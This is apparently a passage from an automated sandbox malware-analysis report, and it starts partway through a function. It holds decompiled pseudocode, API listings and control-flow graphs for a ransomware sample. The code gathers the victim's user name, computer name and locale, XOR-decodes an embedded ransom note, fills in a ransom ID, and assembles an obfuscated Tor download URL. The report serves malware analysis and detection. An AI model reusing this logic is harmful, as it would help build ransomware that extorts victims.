                                    				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x58));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x5c));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
                                    					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
                                    					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
                                    					_a4 = _t47;
                                    					if(_t94 == 0) {
                                    						wsprintfW(_t47, L"undefined");
                                    					} else {
                                    						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
                                    					}
                                    					lstrcatW(_t96,  *(_t91 + 0x64));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96, _a4);
                                    					lstrcatW(_t96, "&");
                                    					VirtualFree(_a4, 0, 0x8000); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x78));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x7c));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
                                    				return _t96;
                                    			}







                                    0x0f1470a4
                                    0x0f1470a7
                                    0x0f1470b8
                                    0x0f1470c1
                                    0x0f1470c9
                                    0x0f1470d2
                                    0x0f1470da
                                    0x0f1470da
                                    0x0f1470df
                                    0x0f1470e5
                                    0x0f1470ed
                                    0x0f1470f3
                                    0x0f1470fb
                                    0x0f1470fb
                                    0x0f147101
                                    0x0f147107
                                    0x0f14710f
                                    0x0f147115
                                    0x0f14711d
                                    0x0f14711d
                                    0x0f147123
                                    0x0f147129
                                    0x0f147131
                                    0x0f147137
                                    0x0f14713f
                                    0x0f14713f
                                    0x0f147145
                                    0x0f14714b
                                    0x0f147153
                                    0x0f147159
                                    0x0f147161
                                    0x0f147161
                                    0x0f147167
                                    0x0f14716d
                                    0x0f147175
                                    0x0f14717b
                                    0x0f147183
                                    0x0f147183
                                    0x0f147189
                                    0x0f14718f
                                    0x0f147197
                                    0x0f14719d
                                    0x0f1471a5
                                    0x0f1471a5
                                    0x0f1471ab
                                    0x0f1471b1
                                    0x0f1471b9
                                    0x0f1471bf
                                    0x0f1471c7
                                    0x0f1471c7
                                    0x0f1471cd
                                    0x0f1471d3
                                    0x0f1471db
                                    0x0f1471e1
                                    0x0f1471e9
                                    0x0f1471e9
                                    0x0f1471ef
                                    0x0f1471fc
                                    0x0f147202
                                    0x0f147205
                                    0x0f14720a
                                    0x0f147227
                                    0x0f14720c
                                    0x0f147216
                                    0x0f14721c
                                    0x0f147234
                                    0x0f14723c
                                    0x0f147242
                                    0x0f14724a
                                    0x0f147256
                                    0x0f147256
                                    0x0f147260
                                    0x0f147266
                                    0x0f14726e
                                    0x0f147274
                                    0x0f14727c
                                    0x0f14727c
                                    0x0f147288
                                    0x0f147292

                                    APIs
                                    • lstrcatW.KERNEL32(?,?), ref: 0F1470C1
                                    • lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F1470C9
                                    • lstrcatW.KERNEL32(?,?), ref: 0F1470D2
                                    • lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F1470DA
                                    • lstrcatW.KERNEL32(?,?), ref: 0F1470E5
                                    • lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F1470ED
                                    • lstrcatW.KERNEL32(?,?), ref: 0F1470F3
                                    • lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F1470FB
                                    • lstrcatW.KERNEL32(?,?), ref: 0F147107
                                    • lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F14710F
                                    • lstrcatW.KERNEL32(?,?), ref: 0F147115
                                    • lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F14711D
                                    • lstrcatW.KERNEL32(?,?), ref: 0F147129
                                    • lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F147131
                                    • lstrcatW.KERNEL32(?,?), ref: 0F147137
                                    • lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F14713F
                                    • lstrcatW.KERNEL32(?,?), ref: 0F14714B
                                    • lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F147153
                                    • lstrcatW.KERNEL32(?,?), ref: 0F147159
                                    • lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F147161
                                    • lstrcatW.KERNEL32(?,?), ref: 0F14716D
                                    • lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F147175
                                    • lstrcatW.KERNEL32(?,?), ref: 0F14717B
                                    • lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F147183
                                    • lstrcatW.KERNEL32(?,0F144B36), ref: 0F14718F
                                    • lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F147197
                                    • lstrcatW.KERNEL32(?,?), ref: 0F14719D
                                    • lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F1471A5
                                    • lstrcatW.KERNEL32(?,?), ref: 0F1471B1
                                    • lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F1471B9
                                    • lstrcatW.KERNEL32(?,?), ref: 0F1471BF
                                    • lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F1471C7
                                    • lstrcatW.KERNEL32(?,?), ref: 0F1471D3
                                    • lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F1471DB
                                    • lstrcatW.KERNEL32(?,?), ref: 0F1471E1
                                    • lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F1471E9
                                    • VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F144869,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F1471FC
                                    • wsprintfW.USER32 ref: 0F147216
                                    • wsprintfW.USER32 ref: 0F147227
                                    • lstrcatW.KERNEL32(?,?), ref: 0F147234
                                    • lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F14723C
                                    • lstrcatW.KERNEL32(?,?), ref: 0F147242
                                    • lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F14724A
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F147256
                                    • lstrcatW.KERNEL32(?,?), ref: 0F147266
                                    • lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F14726E
                                    • lstrcatW.KERNEL32(?,?), ref: 0F147274
                                    • lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F14727C
                                    • lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F144869,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14727F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                    • String ID: %x%x$undefined
                                    • API String ID: 3872469520-3801831566
                                    • Opcode ID: 0d6397ff9298b508ed82d3c9208223eb1a35fd5c5ed31ddaeb9cd1824d48a7b9
                                    • Instruction ID: 4008c2ee750c8581f6892f46d279bec2ee2877dc9a9b3f428de80b73eddee320
                                    • Opcode Fuzzy Hash: 0d6397ff9298b508ed82d3c9208223eb1a35fd5c5ed31ddaeb9cd1824d48a7b9
                                    • Instruction Fuzzy Hash: 28512F32146654B7DB2B3F618C49FDF3A19EFC6700F020054F921151DA8B69A263DFA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 198 f1442b0-f1442c5 199 f144598-f14459d 198->199 200 f1442cb-f144330 call f143bc0 call f147490 call f1472a0 VirtualAlloc 198->200 207 f144341 200->207 208 f144332-f14433b 200->208 210 f144343-f14438a call f1470a0 call f1481f0 lstrlenW 207->210 208->207 209 f14433d-f14433f 208->209 209->210 215 f144390-f1443a2 210->215 215->215 216 f1443a4 215->216 217 f1443b0-f1443bd 216->217 217->217 218 f1443bf-f1443dc call f1481f0 217->218 221 f144456-f144545 218->221 222 f1443de 218->222 223 f144547-f144562 VirtualAlloc 221->223 224 f144578-f144593 VirtualFree call f147d70 221->224 225 f1443e0-f144406 lstrcpyW lstrlenW 222->225 223->224 226 f144564-f144575 wsprintfW 223->226 224->199 225->221 228 f144408-f14440d 225->228 226->224 229 f144413-f14441b 228->229 230 f144447-f144454 229->230 231 f14441d 229->231 230->221 230->229 232 f144420-f144426 231->232 233 f14442c-f144432 232->233 234 f14459e-f1445a5 232->234 235 f144434-f14443b 233->235 236 f14443d-f144441 233->236 234->225 235->232 235->236 236->230 236->234
                                    C-Code - Quality: 49%
                                    			E0F1442B0(void* __ecx, void* __edx) {
                                    				char _v148;
                                    				char _v152;
                                    				WCHAR* _v156;
                                    				void* _v160;
                                    				intOrPtr _v168;
                                    				intOrPtr _v172;
                                    				intOrPtr _v176;
                                    				intOrPtr _v180;
                                    				intOrPtr _v184;
                                    				intOrPtr _v188;
                                    				intOrPtr _v192;
                                    				intOrPtr _v196;
                                    				intOrPtr _v200;
                                    				intOrPtr _v204;
                                    				intOrPtr _v208;
                                    				intOrPtr _v212;
                                    				intOrPtr _v216;
                                    				intOrPtr _v220;
                                    				intOrPtr _v224;
                                    				intOrPtr _v228;
                                    				intOrPtr _v232;
                                    				char _v236;
                                    				intOrPtr _v240;
                                    				void* _v244;
                                    				intOrPtr _v248;
                                    				intOrPtr _v252;
                                    				intOrPtr _v256;
                                    				intOrPtr _v260;
                                    				intOrPtr _v264;
                                    				intOrPtr _v268;
                                    				intOrPtr _v272;
                                    				intOrPtr _v276;
                                    				char _v280;
                                    				void* _t54;
                                    				void* _t58;
                                    				void* _t60;
                                    				signed int _t61;
                                    				void* _t62;
                                    				WCHAR* _t65;
                                    				signed short _t69;
                                    				signed short* _t70;
                                    				WCHAR* _t77;
                                    				signed int _t82;
                                    				signed int _t83;
                                    				void* _t87;
                                    				void* _t90;
                                    				long _t93;
                                    				WCHAR* _t94;
                                    				signed int _t97;
                                    				void* _t98;
                                    				WCHAR* _t100;
                                    				void* _t102;
                                    
                                    				if( *0xf152a64 != 0) {
                                    					L24:
                                    					return _t54;
                                    				}
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ecx);
                                    				_push(0);
                                    				E0F143BC0( &_v148);
                                    				E0F147490( &_v236, __edx); // executed
                                    				_t97 = E0F1472A0( &_v236);
                                    				_t93 = 0x42 + _t97 * 2;
                                    				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
                                    				_v244 = _t58;
                                    				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
                                    					_t98 = 0;
                                    				} else {
                                    					_t98 = _t58;
                                    				}
                                    				E0F1470A0( &_v152, _t98); // executed
                                    				_t60 = E0F1481F0(_t98, L"ransom_id=");
                                    				_t61 = lstrlenW(L"ransom_id=");
                                    				asm("movdqa xmm1, [0xf150510]");
                                    				_t77 = 0xf152000;
                                    				_t87 = 0xa3;
                                    				_t100 = _t60 + _t61 * 2;
                                    				_t62 = 0xa30;
                                    				_v160 = _t100;
                                    				do {
                                    					_t13 =  &(_t77[8]); // 0x44004e
                                    					_t77 = _t13;
                                    					asm("movdqu xmm0, [ecx-0x10]");
                                    					asm("pxor xmm0, xmm1");
                                    					asm("movdqu [ecx-0x10], xmm0");
                                    					_t87 = _t87 - 1;
                                    				} while (_t87 != 0);
                                    				do {
                                    					 *(_t62 + 0xf152000) =  *(_t62 + 0xf152000) ^ 0x00000005;
                                    					_t62 = _t62 + 1;
                                    				} while (_t62 < 0xa38);
                                    				 *0xf152a64 = 0xf152000;
                                    				_t94 = E0F1481F0(0xf152000, L"{USERID}");
                                    				if(_t94 == 0) {
                                    					L20:
                                    					_v280 = 0x740068;
                                    					_v276 = 0x700074;
                                    					_v272 = 0x3a0073;
                                    					_v268 = 0x2f002f;
                                    					_v264 = 0x770077;
                                    					_v260 = 0x2e0077;
                                    					_v256 = 0x6f0074;
                                    					_v252 = 0x700072;
                                    					_v248 = 0x6f0072;
                                    					_v244 = 0x65006a;
                                    					_v240 = 0x740063;
                                    					_v236 = 0x6f002e;
                                    					_v232 = 0x670072;
                                    					_v228 = 0x64002f;
                                    					_v224 = 0x77006f;
                                    					_v220 = 0x6c006e;
                                    					_v216 = 0x61006f;
                                    					_v212 = 0x2f0064;
                                    					_v208 = 0x6f0064;
                                    					_v204 = 0x6e0077;
                                    					_v200 = 0x6f006c;
                                    					_v196 = 0x640061;
                                    					_v192 = 0x65002d;
                                    					_v188 = 0x730061;
                                    					_v184 = 0x2e0079;
                                    					_v180 = 0x740068;
                                    					_v176 = 0x6c006d;
                                    					_v172 = 0x65002e;
                                    					_v168 = 0x6e;
                                    					if( *0xf152a44 == 0) {
                                    						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    						 *0xf152a44 = _t65;
                                    						if(_t65 != 0) {
                                    							wsprintfW(_t65, L"%s",  &_v280);
                                    						}
                                    					}
                                    					VirtualFree(_v160, 0, 0x8000); // executed
                                    					_t54 = E0F147D70( &_v152);
                                    					goto L24;
                                    				}
                                    				while(1) {
                                    					L11:
                                    					lstrcpyW(_t94, _t100);
                                    					_t94[lstrlenW(_t94)] = 0x20;
                                    					_t94 = 0xf152000;
                                    					_t69 =  *0xf152000; // 0xfeff
                                    					if(_t69 == 0) {
                                    						goto L20;
                                    					}
                                    					_t82 = _t69 & 0x0000ffff;
                                    					_t102 = 0xf152000 - L"{USERID}";
                                    					do {
                                    						_t70 = L"{USERID}";
                                    						if(_t82 == 0) {
                                    							goto L19;
                                    						}
                                    						while(1) {
                                    							_t83 =  *_t70 & 0x0000ffff;
                                    							if(_t83 == 0) {
                                    								break;
                                    							}
                                    							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
                                    							if(_t90 != 0) {
                                    								L18:
                                    								if( *_t70 == 0) {
                                    									break;
                                    								}
                                    								goto L19;
                                    							}
                                    							_t70 =  &(_t70[1]);
                                    							if( *(_t102 + _t70) != _t90) {
                                    								continue;
                                    							}
                                    							goto L18;
                                    						}
                                    						_t100 = _v156;
                                    						goto L11;
                                    						L19:
                                    						_t20 =  &(_t94[1]); // 0x2d002d
                                    						_t82 =  *_t20 & 0x0000ffff;
                                    						_t94 =  &(_t94[1]);
                                    						_t102 = _t102 + 2;
                                    					} while (_t82 != 0);
                                    					goto L20;
                                    				}
                                    				goto L20;
                                    			}























































                                    0x0f1442c5
                                    0x0f144598
                                    0x0f14459d
                                    0x0f14459d
                                    0x0f1442cb
                                    0x0f1442cc
                                    0x0f1442ce
                                    0x0f1442cf
                                    0x0f1442d4
                                    0x0f1442d6
                                    0x0f1442d7
                                    0x0f1442d9
                                    0x0f1442da
                                    0x0f1442dc
                                    0x0f1442dd
                                    0x0f1442df
                                    0x0f1442e0
                                    0x0f1442e5
                                    0x0f1442e7
                                    0x0f1442e8
                                    0x0f1442f1
                                    0x0f1442fd
                                    0x0f14430e
                                    0x0f144317
                                    0x0f144321
                                    0x0f144327
                                    0x0f144330
                                    0x0f144341
                                    0x0f14433d
                                    0x0f14433d
                                    0x0f14433d
                                    0x0f14434b
                                    0x0f144357
                                    0x0f144363
                                    0x0f144369
                                    0x0f144371
                                    0x0f144376
                                    0x0f14437b
                                    0x0f14437e
                                    0x0f144383
                                    0x0f144390
                                    0x0f144390
                                    0x0f144390
                                    0x0f144393
                                    0x0f144398
                                    0x0f14439c
                                    0x0f1443a1
                                    0x0f1443a1
                                    0x0f1443b0
                                    0x0f1443b0
                                    0x0f1443b7
                                    0x0f1443b8
                                    0x0f1443c4
                                    0x0f1443d8
                                    0x0f1443dc
                                    0x0f144456
                                    0x0f14445d
                                    0x0f144465
                                    0x0f14446d
                                    0x0f144475
                                    0x0f14447d
                                    0x0f144485
                                    0x0f14448d
                                    0x0f144495
                                    0x0f14449d
                                    0x0f1444a5
                                    0x0f1444ad
                                    0x0f1444b5
                                    0x0f1444bd
                                    0x0f1444c5
                                    0x0f1444cd
                                    0x0f1444d5
                                    0x0f1444dd
                                    0x0f1444e5
                                    0x0f1444ed
                                    0x0f1444f5
                                    0x0f1444fd
                                    0x0f144505
                                    0x0f14450d
                                    0x0f144515
                                    0x0f14451d
                                    0x0f144525
                                    0x0f14452d
                                    0x0f144535
                                    0x0f14453d
                                    0x0f144545
                                    0x0f144555
                                    0x0f14455b
                                    0x0f144562
                                    0x0f14456f
                                    0x0f144575
                                    0x0f144562
                                    0x0f144586
                                    0x0f144593
                                    0x00000000
                                    0x0f144593
                                    0x0f1443e0
                                    0x0f1443e0
                                    0x0f1443e2
                                    0x0f1443f4
                                    0x0f1443f8
                                    0x0f1443fd
                                    0x0f144406
                                    0x00000000
                                    0x00000000
                                    0x0f14440a
                                    0x0f14440d
                                    0x0f144413
                                    0x0f144413
                                    0x0f14441b
                                    0x00000000
                                    0x00000000
                                    0x0f144420
                                    0x0f144420
                                    0x0f144426
                                    0x00000000
                                    0x00000000
                                    0x0f144430
                                    0x0f144432
                                    0x0f14443d
                                    0x0f144441
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f144441
                                    0x0f144434
                                    0x0f14443b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f14443b
                                    0x0f14459e
                                    0x00000000
                                    0x0f144447
                                    0x0f144447
                                    0x0f144447
                                    0x0f14444b
                                    0x0f14444e
                                    0x0f144451
                                    0x00000000
                                    0x0f144413
                                    0x00000000

                                    APIs
                                      • Part of subcall function 0F143BC0: GetProcessHeap.KERNEL32(?,?,0F144807,00000000,?,00000000,00000000), ref: 0F143C5C
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1474B7
                                      • Part of subcall function 0F147490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F1474C8
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1474E6
                                      • Part of subcall function 0F147490: GetComputerNameW.KERNEL32 ref: 0F1474F0
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F147510
                                      • Part of subcall function 0F147490: wsprintfW.USER32 ref: 0F147551
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F14756E
                                      • Part of subcall function 0F147490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F147592
                                      • Part of subcall function 0F147490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F144810,?), ref: 0F1475B6
                                      • Part of subcall function 0F147490: RegCloseKey.KERNEL32(00000000), ref: 0F1475D2
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472F2
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472FD
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147313
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14731E
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147334
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14733F
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147355
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(0F144B36,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147360
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147376
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147381
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147397
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473A2
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473C1
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473CC
                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144321
                                    • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144363
                                    • lstrcpyW.KERNEL32 ref: 0F1443E2
                                    • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1443E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                    • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
                                    • API String ID: 4100118565-2385900546
                                    • Opcode ID: b4bf475bc446db78834fb3dfb592b5c169322441f4d47d72684e9e394a69ba4a
                                    • Instruction ID: 7af91b1b827f6f9ab68d28e9d2a969c157749033183973130e45bf42c520036b
                                    • Opcode Fuzzy Hash: b4bf475bc446db78834fb3dfb592b5c169322441f4d47d72684e9e394a69ba4a
                                    • Instruction Fuzzy Hash: D671F270504380DBE720DF10C81976B7BE1FBC0B58F54491CFA855B292EBB9B5A8CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 237 f1443a6-f1443ad 238 f1443b0-f1443bd 237->238 238->238 239 f1443bf-f1443dc call f1481f0 238->239 242 f144456-f144545 239->242 243 f1443de 239->243 244 f144547-f144562 VirtualAlloc 242->244 245 f144578-f14459d VirtualFree call f147d70 242->245 246 f1443e0-f144406 lstrcpyW lstrlenW 243->246 244->245 247 f144564-f144575 wsprintfW 244->247 246->242 249 f144408-f14440d 246->249 247->245 251 f144413-f14441b 249->251 252 f144447-f144454 251->252 253 f14441d 251->253 252->242 252->251 254 f144420-f144426 253->254 255 f14442c-f144432 254->255 256 f14459e-f1445a5 254->256 257 f144434-f14443b 255->257 258 f14443d-f144441 255->258 256->246 257->254 257->258 258->252 258->256
                                    C-Code - Quality: 100%
                                    			E0F1443A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
                                    				void* _t41;
                                    				void* _t44;
                                    				WCHAR* _t45;
                                    				signed short _t49;
                                    				signed short* _t50;
                                    				signed int _t55;
                                    				signed int _t56;
                                    				void* _t59;
                                    				WCHAR* _t60;
                                    				WCHAR* _t62;
                                    				void* _t65;
                                    
                                    				_t41 = __eax;
                                    				do {
                                    					 *(_t41 + 0xf152000) =  *(_t41 + 0xf152000) ^ 0x00000005;
                                    					_t41 = _t41 + 1;
                                    				} while (_t41 < 0xa38);
                                    				 *0xf152a64 = 0xf152000;
                                    				_t60 = E0F1481F0(0xf152000, L"{USERID}");
                                    				if(_t60 != 0) {
                                    					while(1) {
                                    						L4:
                                    						lstrcpyW(_t60, _t62);
                                    						_t60[lstrlenW(_t60)] = 0x20;
                                    						_t60 = 0xf152000;
                                    						_t49 =  *0xf152000; // 0xfeff
                                    						if(_t49 == 0) {
                                    							goto L13;
                                    						}
                                    						_t55 = _t49 & 0x0000ffff;
                                    						_t65 = 0xf152000 - L"{USERID}";
                                    						do {
                                    							_t50 = L"{USERID}";
                                    							if(_t55 == 0) {
                                    								goto L12;
                                    							} else {
                                    								while(1) {
                                    									_t56 =  *_t50 & 0x0000ffff;
                                    									if(_t56 == 0) {
                                    										break;
                                    									}
                                    									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
                                    									if(_t59 != 0) {
                                    										L11:
                                    										if( *_t50 == 0) {
                                    											break;
                                    										} else {
                                    											goto L12;
                                    										}
                                    									} else {
                                    										_t50 =  &(_t50[1]);
                                    										if( *(_t65 + _t50) != _t59) {
                                    											continue;
                                    										} else {
                                    											goto L11;
                                    										}
                                    									}
                                    									goto L13;
                                    								}
                                    								_t62 = _a132;
                                    								goto L4;
                                    							}
                                    							goto L13;
                                    							L12:
                                    							_t7 =  &(_t60[1]); // 0x2d002d
                                    							_t55 =  *_t7 & 0x0000ffff;
                                    							_t60 =  &(_t60[1]);
                                    							_t65 = _t65 + 2;
                                    						} while (_t55 != 0);
                                    						goto L13;
                                    					}
                                    				}
                                    				L13:
                                    				_a8 = 0x740068;
                                    				_a12 = 0x700074;
                                    				_a16 = 0x3a0073;
                                    				_a20 = 0x2f002f;
                                    				_a24 = 0x770077;
                                    				_a28 = 0x2e0077;
                                    				_a32 = 0x6f0074;
                                    				_a36 = 0x700072;
                                    				_a40 = 0x6f0072;
                                    				_a44 = 0x65006a;
                                    				_a48 = 0x740063;
                                    				_a52 = 0x6f002e;
                                    				_a56 = 0x670072;
                                    				_a60 = 0x64002f;
                                    				_a64 = 0x77006f;
                                    				_a68 = 0x6c006e;
                                    				_a72 = 0x61006f;
                                    				_a76 = 0x2f0064;
                                    				_a80 = 0x6f0064;
                                    				_a84 = 0x6e0077;
                                    				_a88 = 0x6f006c;
                                    				_a92 = 0x640061;
                                    				_a96 = 0x65002d;
                                    				_a100 = 0x730061;
                                    				_a104 = 0x2e0079;
                                    				_a108 = 0x740068;
                                    				_a112 = 0x6c006d;
                                    				_a116 = 0x65002e;
                                    				_a120 = 0x6e;
                                    				if( *0xf152a44 == 0) {
                                    					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    					 *0xf152a44 = _t45;
                                    					if(_t45 != 0) {
                                    						wsprintfW(_t45, L"%s",  &_a8);
                                    					}
                                    				}
                                    				VirtualFree(_a128, 0, 0x8000); // executed
                                    				_t44 = E0F147D70( &_a136);
                                    				return _t44;
                                    			}














                                    0x0f1443a6
                                    0x0f1443b0
                                    0x0f1443b0
                                    0x0f1443b7
                                    0x0f1443b8
                                    0x0f1443c4
                                    0x0f1443d8
                                    0x0f1443dc
                                    0x0f1443e0
                                    0x0f1443e0
                                    0x0f1443e2
                                    0x0f1443f4
                                    0x0f1443f8
                                    0x0f1443fd
                                    0x0f144406
                                    0x00000000
                                    0x00000000
                                    0x0f14440a
                                    0x0f14440d
                                    0x0f144413
                                    0x0f144413
                                    0x0f14441b
                                    0x00000000
                                    0x0f144420
                                    0x0f144420
                                    0x0f144420
                                    0x0f144426
                                    0x00000000
                                    0x00000000
                                    0x0f144430
                                    0x0f144432
                                    0x0f14443d
                                    0x0f144441
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f144434
                                    0x0f144434
                                    0x0f14443b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f14443b
                                    0x00000000
                                    0x0f144432
                                    0x0f14459e
                                    0x00000000
                                    0x0f14459e
                                    0x00000000
                                    0x0f144447
                                    0x0f144447
                                    0x0f144447
